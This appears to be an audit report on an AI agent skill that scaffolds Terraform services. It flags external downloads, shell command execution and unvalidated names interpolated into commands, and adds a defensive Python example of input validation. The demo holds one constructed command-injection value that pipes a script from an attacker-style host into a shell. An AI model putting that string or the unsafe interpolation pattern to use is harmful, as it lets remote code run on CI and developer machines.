terraform-service-scaffold
Warn
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: MEDIUM
Findings: EXTERNAL_DOWNLOADS, COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [EXTERNAL_DOWNLOADS]: The skill instructs the user and the agent to install and use git-secret-protector, an external Python package from an unverified third-party source (github.com/nicovince/git-secret-protector). Because this tool encrypts and decrypts sensitive infrastructure secrets, a compromise of the package (or of the index it is installed from) would expose those credentials.
- [COMMAND_EXECUTION]: The skill generates local setup scripts and GitHub Actions workflows that execute shell commands (pip install, git-secret-protector init, terraform init). These commands are built from variables such as {project} and {service}, which the user supplies at runtime.
- [PROMPT_INJECTION]: The skill does not validate user-provided inputs such as the service name and project identifier. These values are interpolated into shell commands, file paths, and Terraform configuration blocks without boundary markers or an allowlist check. This is an indirect prompt injection surface: a crafted value could lead to command injection, path traversal, or injection of additional Terraform configuration in the CI/CD environment or on the local machine.
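The following is an added example, not code from the audited skill or from Gen Agent Trust Hub, showing the checks the COMMAND_EXECUTION and PROMPT_INJECTION findings say are missing: an allowlist for {project} and {service}, argv lists instead of shell strings, a containment check on generated paths, and escaped HCL string literals. The allowlist pattern, the module block layout and the -chdir invocation are assumptions chosen for illustration; the hostile input is constructed.

```python
"""Guarding user-supplied {project}/{service} values before they reach a shell,
a filesystem path or a Terraform block.  Added example; the allowlist rule and
the module layout are assumptions, not the audited skill's own design."""
import json
import re
from pathlib import Path

# Assumed allowlist: DNS-label style names, max 63 chars. The skill defines no
# such rule; this is the validation the audit reports as absent.
NAME_RE = re.compile(r"[a-z][a-z0-9-]{0,62}")


def is_valid_name(value: str) -> bool:
    return NAME_RE.fullmatch(value) is not None


def validate_name(value: str, what: str) -> str:
    """Fail closed: only plain lowercase identifiers pass."""
    if not is_valid_name(value):
        raise ValueError(f"invalid {what}: {value!r}")
    return value


def unsafe_setup_command(project: str, service: str) -> str:
    """The flagged pattern: raw interpolation into one shell string."""
    return f"git-secret-protector init && terraform init {project}/{service}"


def safe_setup_argv(project: str, service: str) -> list[list[str]]:
    """Validated names, then argv lists for subprocess.run(argv) with shell=False,
    so ';', '|', '$(...)' and friends are inert even if validation is relaxed."""
    validate_name(project, "project")
    validate_name(service, "service")
    return [
        ["git-secret-protector", "init"],
        ["terraform", f"-chdir={project}/{service}", "init"],
    ]


def contained_path(root: Path, *parts: str) -> Path:
    """Resolve root/parts and refuse any result outside root (traversal or
    absolute components).  Belt and braces on top of validate_name."""
    root_r = root.resolve()
    target = root_r.joinpath(*parts).resolve()
    if target != root_r and root_r not in target.parents:
        raise ValueError(f"path escapes {root_r}: {target}")
    return target


def hcl_string(value: str) -> str:
    """Quote value as an HCL string literal.  JSON escaping covers quotes and
    newlines; ${ and %{ are doubled so HCL does not treat them as templates."""
    return json.dumps(value).replace("${", "$${").replace("%{", "%%{")


def render_module_block(project: str, service: str) -> str:
    """Generate the Terraform block from validated, quoted values only."""
    validate_name(project, "project")
    validate_name(service, "service")
    return (
        f'module "{service}" {{\n'
        '  source  = "./modules/service"\n'
        f"  project = {hcl_string(project)}\n"
        f"  name    = {hcl_string(service)}\n"
        "}\n"
    )


if __name__ == "__main__":
    hostile = "svc; curl http://attacker.example/x | sh"  # constructed input
    print(unsafe_setup_command("demo", hostile))  # a shell would run curl here
    try:
        safe_setup_argv("demo", hostile)
    except ValueError as err:
        print("rejected:", err)
    print(render_module_block("demo", "payments-api"))
```

Run the argv lists with subprocess.run(argv, check=True), never with shell=True; the validation removes the attack characters, and the argv form means an oversight in the regex still cannot turn a name into a second command.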
Audit Metadata